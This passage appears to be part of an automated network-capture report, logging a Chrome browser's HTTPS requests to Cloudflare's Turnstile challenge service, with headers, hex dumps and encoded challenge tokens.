                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC1369INData Raw: 46 7a 6f 48 74 6a 66 5a 4e 37 67 36 6d 66 6a 59 31 39 68 36 57 77 62 71 71 57 6a 70 47 44 71 5a 52 33 66 36 32 79 66 49 33 44 6a 61 61 38 6c 4b 61 65 67 36 76 43 7a 59 79 4b 77 4a 48 44 6a 63 33 41 6f 5a 44 4d 78 5a 4c 56 79 5a 36 37 77 62 76 51 76 2b 47 6b 34 38 44 41 31 4c 37 62 71 75 43 70 37 4d 50 42 73 62 37 69 35 4c 2f 6b 31 62 62 73 38 74 33 58 39 66 6a 32 76 74 6e 50 34 2b 54 47 77 50 6e 52 2b 74 7a 38 36 66 63 4a 7a 66 33 61 37 2b 49 58 46 75 7a 4f 43 68 73 54 32 39 50 57 49 66 54 58 32 2f 50 62 37 65 41 70 49 42 33 6d 36 42 55 57 4c 75 66 36 43 67 76 77 49 66 48 78 4d 53 7a 31 38 43 59 50 2b 7a 6b 53 50 7a 38 62 4d 30 45 43 48 44 51 63 53 6a 30 73 52 69 41 50 4b 77 30 73 50 31 49 79 4b 54 4a 55 4d 45 67 52 4d 54 59 76 4a 7a 4e 56 58 6a 42 68 4f
                                                                                                                                                                                                                                            Data Ascii: FzoHtjfZN7g6mfjY19h6WwbqqWjpGDqZR3f62yfI3Djaa8lKaeg6vCzYyKwJHDjc3AoZDMxZLVyZ67wbvQv+Gk48DA1L7bquCp7MPBsb7i5L/k1bbs8t3X9fj2vtnP4+TGwPnR+tz86fcJzf3a7+IXFuzOChsT29PWIfTX2/Pb7eApIB3m6BUWLuf6CgvwIfHxMSz18CYP+zkSPz8bM0ECHDQcSj0sRiAPKw0sP1IyKTJUMEgRMTYvJzNVXjBhO
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC1369INData Raw: 6f 68 4b 74 72 5a 36 42 71 62 61 65 78 6e 71 79 45 71 37 61 6b 69 72 65 65 69 36 79 41 65 35 4b 52 68 63 4f 41 66 34 4b 43 79 59 61 72 6c 36 47 63 69 62 50 53 72 64 4f 76 30 71 69 30 6c 74 79 6e 6b 38 71 64 32 5a 76 4b 32 4d 4f 68 35 72 4c 54 35 4c 54 57 72 4f 76 50 78 75 37 6e 77 37 47 71 7a 4e 66 4d 39 4d 61 79 37 62 57 35 31 64 6a 61 31 2f 6a 79 30 4c 37 2b 39 4f 58 39 43 51 4c 65 43 2b 4c 47 33 74 6e 79 30 77 48 51 41 2f 4c 56 34 39 55 4e 31 39 62 71 45 50 51 4f 2b 51 2f 30 33 51 38 55 2b 2f 59 47 41 52 38 44 39 77 67 68 49 43 59 4c 49 2f 4d 6b 42 53 55 52 4f 7a 67 31 46 66 51 53 51 54 41 32 47 6b 4d 41 4e 42 55 78 53 30 4e 4c 47 7a 5a 45 47 42 46 41 43 79 56 42 52 43 34 54 49 69 35 4c 45 7a 64 49 4c 31 31 43 4d 56 6b 2b 4e 43 52 64 4d 31 55 2b 56 45
                                                                                                                                                                                                                                            Data Ascii: ohKtrZ6BqbaexnqyEq7akireei6yAe5KRhcOAf4KCyYarl6GcibPSrdOv0qi0ltynk8qd2ZvK2MOh5rLT5LTWrOvPxu7nw7GqzNfM9May7bW51dja1/jy0L7+9OX9CQLeC+LG3tny0wHQA/LV49UN19bqEPQO+Q/03Q8U+/YGAR8D9wghICYLI/MkBSUROzg1FfQSQTA2GkMANBUxS0NLGzZEGBFACyVBRC4TIi5LEzdIL11CMVk+NCRdM1U+VE
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC1369INData Raw: 5a 59 43 50 73 61 69 78 75 48 4b 74 64 5a 69 54 71 4a 65 68 67 48 57 56 75 35 47 57 68 36 43 6a 68 6f 71 39 79 62 44 43 70 63 32 4c 77 64 61 31 6b 5a 6a 43 75 70 65 35 74 64 36 52 79 36 6d 39 33 4e 36 2b 6e 64 6e 48 35 62 37 56 76 62 36 6d 34 4c 2f 50 78 75 4b 77 76 72 54 55 31 37 58 75 39 37 58 50 36 63 66 74 36 72 72 77 76 66 50 75 33 41 6a 37 77 2f 37 47 37 4f 44 6a 30 41 67 48 45 38 30 47 2f 74 38 5a 2b 50 6a 77 33 42 62 32 44 67 6f 4c 2f 68 45 4e 47 4f 62 68 35 67 6e 30 49 75 6e 74 2f 69 41 46 36 4f 51 68 4d 67 2f 32 4b 51 50 77 4a 52 4d 35 45 66 6a 31 38 6a 49 72 50 77 45 36 41 42 58 2b 4a 78 31 47 42 55 5a 44 4b 51 4e 41 4f 30 49 53 4d 7a 56 54 45 56 41 7a 4a 44 67 2f 4f 78 59 37 56 69 4e 44 5a 6b 4d 78 4f 42 74 70 56 79 63 70 62 30 78 46 62 30 31
                                                                                                                                                                                                                                            Data Ascii: ZYCPsaixuHKtdZiTqJehgHWVu5GWh6Cjhoq9ybDCpc2Lwda1kZjCupe5td6Ry6m93N6+ndnH5b7Vvb6m4L/PxuKwvrTU17Xu97XP6cft6rrwvfPu3Aj7w/7G7ODj0AgHE80G/t8Z+Pjw3Bb2DgoL/hENGObh5gn0Iunt/iAF6OQhMg/2KQPwJRM5Efj18jIrPwE6ABX+Jx1GBUZDKQNAO0ISMzVTEVAzJDg/OxY7ViNDZkMxOBtpVycpb0xFb01
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC1369INData Raw: 5a 6d 78 68 6f 65 58 74 6f 42 2b 6b 62 47 69 6a 37 36 2b 73 4a 2f 49 78 5a 32 58 7a 38 4f 4b 6e 35 2b 77 6f 6f 33 4f 73 35 4b 69 31 73 54 49 78 5a 6e 49 33 39 4c 55 71 2b 53 36 32 36 2b 6b 32 61 48 62 34 65 32 37 7a 38 2f 78 76 4f 4b 76 33 63 76 43 35 4f 7a 4c 37 4f 66 37 35 39 62 2b 38 39 44 4d 7a 4d 54 64 77 75 6e 54 43 76 50 59 7a 64 6b 4e 35 4f 6f 4d 42 39 7a 6f 7a 51 6b 42 47 64 4d 62 7a 68 73 4a 41 50 4c 71 34 69 4d 68 44 79 55 47 41 68 6a 39 42 66 6b 5a 4a 65 67 65 4b 75 38 67 4d 78 45 44 45 79 7a 35 4e 68 4c 31 4d 43 30 33 46 66 67 72 48 6b 51 7a 4f 66 6b 30 4e 42 6b 6a 50 45 42 51 4b 42 74 51 44 42 38 76 4d 42 4e 42 55 54 6b 59 4a 6b 6b 2f 4c 6a 63 34 4c 53 4d 2b 58 30 59 2f 50 44 49 32 4b 45 6c 68 51 55 77 6d 61 33 4a 67 63 69 78 68 62 55 64 43
                                                                                                                                                                                                                                            Data Ascii: ZmxhoeXtoB+kbGij76+sJ/IxZ2Xz8OKn5+woo3Os5Ki1sTIxZnI39LUq+S626+k2aHb4e27z8/xvOKv3cvC5OzL7Of759b+89DMzMTdwunTCvPYzdkN5OoMB9zozQkBGdMbzhsJAPLq4iMhDyUGAhj9BfkZJegeKu8gMxEDEyz5NhL1MC03FfgrHkQzOfk0NBkjPEBQKBtQDB8vMBNBUTkYJkk/Ljc4LSM+X0Y/PDI2KElhQUwma3JgcixhbUdC


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            145192.168.2.1749957104.18.95.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:57 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1345087052:1736511132:9pUcYqZrWbbHpnfn5qQ_UbKx0b4hCOzXHinJW-FbhBw/8ffcb89d1f3defa1/qdboioj1nzs.qKQ2IGA2i7DiVRCgVnxvzNdYE4uMfkM-1736512675-1.1.1.1-w8jZba1V.DYVKzlxhgfgquKi9isi8IRagts8fZYqLVNPs8x4jdIPsX2NIiP90oRo HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC375INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:57 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Content-Length: 7
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            cf-chl-out: nNYJCBsTUOw31e0Um4lO1g==$81RCqf826NzOMsnbiK+RoA==
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb8ad6d794411-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                            Data Ascii: invalid


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            146192.168.2.1749958104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8ffcb89d1f3defa1/1736512677070/VO297syEMFordm7 HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:58 GMT
                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb8af9b780fa4-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 4f 08 02 00 00 00 6d 49 d2 14 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                            Data Ascii: PNGIHDROmIIDAT$IENDB`


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            147192.168.2.1749960104.18.95.41443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8ffcb89d1f3defa1/1736512677070/VO297syEMFordm7 HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:58 GMT
                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                            Content-Length: 61
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb8b35a837298-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 4f 08 02 00 00 00 6d 49 d2 14 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                            Data Ascii: PNGIHDROmIIDAT$IENDB`


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            148192.168.2.1749961104.18.94.41443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:37:58 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8ffcb89d1f3defa1/1736512677071/7977c391453e8cc5dc41842a441afeb8af031a56098e1995b3d4de3c39a237ab/Yl3kcMMdozhDgWJ HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:37:59 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:37:59 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:37:59 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 65 58 66 44 6b 55 55 2d 6a 4d 58 63 51 59 51 71 52 42 72 2d 75 4b 38 44 47 6c 59 4a 6a 68 6d 56 73 39 54 65 50 44 6d 69 4e 36 73 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20geXfDkUU-jMXcQYQqRBr-uK8DGlYJjhmVs9TePDmiN6sAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                                            2025-01-10 12:37:59 UTC1INData Raw: 4a
                                                                                                                                                                                                                                            Data Ascii: J


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            149192.168.2.1749962104.18.94.41443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1345087052:1736511132:9pUcYqZrWbbHpnfn5qQ_UbKx0b4hCOzXHinJW-FbhBw/8ffcb89d1f3defa1/qdboioj1nzs.qKQ2IGA2i7DiVRCgVnxvzNdYE4uMfkM-1736512675-1.1.1.1-w8jZba1V.DYVKzlxhgfgquKi9isi8IRagts8fZYqLVNPs8x4jdIPsX2NIiP90oRo HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 32287
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            CF-Challenge: qdboioj1nzs.qKQ2IGA2i7DiVRCgVnxvzNdYE4uMfkM-1736512675-1.1.1.1-w8jZba1V.DYVKzlxhgfgquKi9isi8IRagts8fZYqLVNPs8x4jdIPsX2NIiP90oRo
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC16384OUTData Raw: 76 5f 38 66 66 63 62 38 39 64 31 66 33 64 65 66 61 31 3d 57 35 56 58 6a 68 38 36 6f 48 35 50 35 50 39 35 38 30 38 48 46 4a 53 48 4f 45 25 32 62 50 77 50 6c 73 50 33 4f 54 68 50 69 58 38 49 35 54 42 38 50 6c 50 42 6f 38 55 38 6d 50 32 58 2d 49 58 50 39 56 50 79 58 33 55 50 35 6b 4a 38 75 50 53 58 49 38 5a 62 2d 44 50 30 50 2d 58 50 24 50 6a 71 4a 6d 77 50 62 32 56 38 32 66 48 70 30 7a 7a 46 50 69 6a 35 38 2d 50 79 56 50 61 50 2d 79 69 56 50 41 6a 61 61 45 44 50 5a 2d 71 6f 56 50 50 44 4a 50 62 70 50 50 45 39 44 74 50 33 57 53 50 50 4b 61 68 63 79 74 69 33 56 50 47 4a 4b 52 34 57 6a 35 44 56 50 79 69 50 4b 49 4e 48 59 61 45 50 38 6a 36 2b 53 58 35 56 70 61 66 50 38 54 36 48 49 30 54 64 64 47 45 30 44 68 65 7a 42 77 74 65 41 4e 6b 55 44 63 79 71 34 63 6f 4b
                                                                                                                                                                                                                                            Data Ascii: v_8ffcb89d1f3defa1=W5VXjh86oH5P5P95808HFJSHOE%2bPwPlsP3OThPiX8I5TB8PlPBo8U8mP2X-IXP9VPyX3UP5kJ8uPSXI8Zb-DP0P-XP$PjqJmwPb2V82fHp0zzFPij58-PyVPaP-yiVPAjaaEDPZ-qoVPPDJPbpPPE9DtP3WSPPKahcyti3VPGJKR4Wj5DVPyiPKINHYaEP8j6+SX5VpafP8T6HI0TddGE0DhezBwteANkUDcyq4coK
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC15903OUTData Raw: 42 50 38 4b 78 4b 79 47 50 37 2b 53 61 50 6f 2b 49 50 4c 52 6c 78 56 50 62 49 2d 50 68 56 50 42 50 57 35 50 58 50 43 50 48 46 50 43 50 57 4a 30 4a 38 59 68 36 50 57 4a 68 4a 38 69 50 50 50 54 46 61 31 76 49 50 6a 4a 6f 58 79 56 50 77 50 71 68 30 6f 38 4e 50 51 35 68 50 54 34 50 43 58 50 4f 38 45 50 4e 50 79 4f 68 63 50 54 58 53 50 50 6b 50 56 50 33 24 68 73 50 43 50 56 35 50 58 50 42 53 48 2d 38 34 50 50 4a 45 50 68 4f 58 4b 50 47 50 58 48 38 69 50 51 4a 45 55 38 37 65 74 38 50 36 38 6c 50 4f 49 33 48 38 67 50 4f 49 33 35 49 35 36 33 46 68 48 50 76 30 68 50 54 30 52 36 6f 79 39 58 50 50 37 38 55 74 6e 38 79 4c 55 71 6c 2b 50 36 6f 54 50 54 2b 50 55 58 37 56 45 42 38 77 58 51 56 45 47 50 34 58 6e 6f 33 45 4f 36 6f 50 46 38 77 58 5a 4d 57 6f 53 4b 50 36 6f
                                                                                                                                                                                                                                            Data Ascii: BP8KxKyGP7+SaPo+IPLRlxVPbI-PhVPBPW5PXPCPHFPCPWJ0J8Yh6PWJhJ8iPPPTFa1vIPjJoXyVPwPqh0o8NPQ5hPT4PCXPO8EPNPyOhcPTXSPPkPVP3$hsPCPV5PXPBSH-84PPJEPhOXKPGPXH8iPQJEU87et8P68lPOI3H8gPOI35I563FhHPv0hPT0R6oy9XPP78Utn8yLUql+P6oTPT+PUX7VEB8wXQVEGP4Xno3EO6oPF8wXZMWoSKP6o
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:38:00 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 26344
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cf-chl-gen: eQgmQi6xd+2GQN6p9LmoOCvxe5C11Xa6HuLWIL89W8WZ2hjN8hCZbMEvjS/xlkyy$m6r9siVLy+vvGmtsGfZVew==
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb8ba5e0441a1-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1047INData Raw: 73 4a 42 78 64 70 68 31 6b 49 79 62 6e 6f 4f 57 6e 63 4b 7a 77 4d 65 61 78 72 75 38 72 73 61 2f 77 4c 4c 54 72 4c 57 33 70 49 2f 46 72 61 50 51 73 39 79 32 79 4b 43 59 31 62 79 77 76 73 66 68 35 65 4c 71 33 4d 71 37 70 39 48 52 71 75 37 50 31 4f 72 52 74 2f 71 32 75 2f 54 6d 7a 67 44 5a 38 39 50 77 32 39 66 33 39 65 4c 55 2b 50 33 6b 7a 41 38 41 79 51 6a 4b 30 4f 58 30 35 65 77 49 45 74 6a 77 31 2f 37 76 49 4e 67 62 48 4f 41 4f 4a 78 76 6a 33 2f 62 32 47 53 37 34 48 66 63 49 37 2b 67 50 37 2f 30 4f 4c 68 45 46 4f 69 6e 75 2f 41 67 7a 46 41 38 79 49 44 49 45 47 68 55 34 51 7a 4d 4b 47 30 49 71 4c 52 77 53 51 41 5a 4c 56 31 4d 70 4d 54 6b 59 45 69 31 4a 4c 79 30 63 54 6b 49 67 49 31 49 32 4d 53 42 55 4a 69 56 4e 4f 47 42 65 4d 56 4e 54 53 46 51 6f 61 48 49
                                                                                                                                                                                                                                            Data Ascii: sJBxdph1kIybnoOWncKzwMeaxru8rsa/wLLTrLW3pI/FraPQs9y2yKCY1bywvsfh5eLq3Mq7p9HRqu7P1OrRt/q2u/TmzgDZ89Pw29f39eLU+P3kzA8AyQjK0OX05ewIEtjw1/7vINgbHOAOJxvj3/b2GS74HfcI7+gP7/0OLhEFOinu/AgzFA8yIDIEGhU4QzMKG0IqLRwSQAZLV1MpMTkYEi1JLy0cTkIgI1I2MSBUJiVNOGBeMVNTSFQoaHI
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1369INData Raw: 38 76 4c 32 64 30 62 4f 74 70 4a 33 49 6c 62 66 4e 31 63 4f 36 74 36 72 63 31 4e 36 75 77 5a 61 78 75 73 65 6f 78 64 33 58 36 63 33 6f 37 62 7a 6a 77 65 66 4d 73 61 33 4e 30 74 66 6e 78 39 7a 46 32 50 50 4d 7a 39 44 50 37 41 62 6c 77 63 4c 6a 42 64 66 44 7a 4d 59 44 42 78 45 4e 33 78 55 57 44 65 44 52 39 4f 50 6b 36 51 34 56 45 39 72 73 44 2f 77 65 33 75 49 43 47 76 54 6f 39 75 4c 34 44 67 73 43 2b 65 6b 75 4d 44 4d 78 38 68 63 73 45 69 6b 72 50 51 30 78 38 68 6a 35 4d 6a 6f 58 47 44 72 36 45 77 73 6b 54 68 77 6f 42 79 73 70 49 6c 41 55 52 6a 52 43 49 6b 74 52 45 31 35 4f 48 55 77 77 56 6a 31 67 52 56 6c 63 58 45 4a 70 58 45 70 67 4f 30 6c 78 4d 58 4d 77 51 57 78 68 4e 6c 51 76 52 6e 41 34 66 6d 39 6f 58 33 64 4e 56 34 47 41 66 32 61 42 64 57 46 6f 65 56
                                                                                                                                                                                                                                            Data Ascii: 8vL2d0bOtpJ3IlbfN1cO6t6rc1N6uwZaxuseoxd3X6c3o7bzjwefMsa3N0tfnx9zF2PPMz9DP7AblwcLjBdfDzMYDBxEN3xUWDeDR9OPk6Q4VE9rsD/we3uICGvTo9uL4DgsC+ekuMDMx8hcsEikrPQ0x8hj5MjoXGDr6EwskThwoByspIlAURjRCIktRE15OHUwwVj1gRVlcXEJpXEpgO0lxMXMwQWxhNlQvRnA4fm9oX3dNV4GAf2aBdWFoeV
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1369INData Raw: 73 73 6d 4f 76 35 4b 32 30 71 7a 61 32 37 79 66 76 61 72 54 7a 71 2b 76 35 64 58 64 79 4d 47 2f 32 75 48 76 32 37 76 79 34 4c 4c 4d 30 4f 43 79 30 76 6e 4b 74 39 44 62 79 64 58 77 32 73 48 76 34 77 4c 30 37 39 59 4b 79 76 72 55 43 39 2f 77 36 51 2f 77 33 39 51 50 43 78 6b 42 34 74 66 59 46 78 41 52 37 74 67 54 37 68 66 7a 4a 69 49 61 35 53 4d 4d 42 77 48 6a 4a 43 49 41 4d 69 30 30 41 67 4d 59 4a 68 51 52 42 68 48 35 50 42 41 53 48 54 54 36 48 42 38 68 45 42 38 37 45 6a 4d 30 4e 30 30 38 45 42 41 62 44 6a 45 6c 4d 42 39 4e 4b 46 6f 73 4a 69 30 38 4c 30 70 54 4e 42 34 39 47 78 67 69 51 7a 5a 45 57 57 49 37 62 6c 35 61 57 32 4d 78 59 45 4e 6b 59 45 46 6c 52 57 6c 55 56 30 35 31 4f 6a 67 2b 67 54 35 35 50 58 35 58 69 6c 31 56 58 54 39 4e 66 58 35 70 6b 56 74
                                                                                                                                                                                                                                            Data Ascii: ssmOv5K20qza27yfvarTzq+v5dXdyMG/2uHv27vy4LLM0OCy0vnKt9DbydXw2sHv4wL079YKyvrUC9/w6Q/w39QPCxkB4tfYFxAR7tgT7hfzJiIa5SMMBwHjJCIAMi00AgMYJhQRBhH5PBASHTT6HB8hEB87EjM0N008EBAbDjElMB9NKFosJi08L0pTNB49GxgiQzZEWWI7bl5aW2MxYENkYEFlRWlUV051Ojg+gT55PX5Xil1VXT9NfX5pkVt
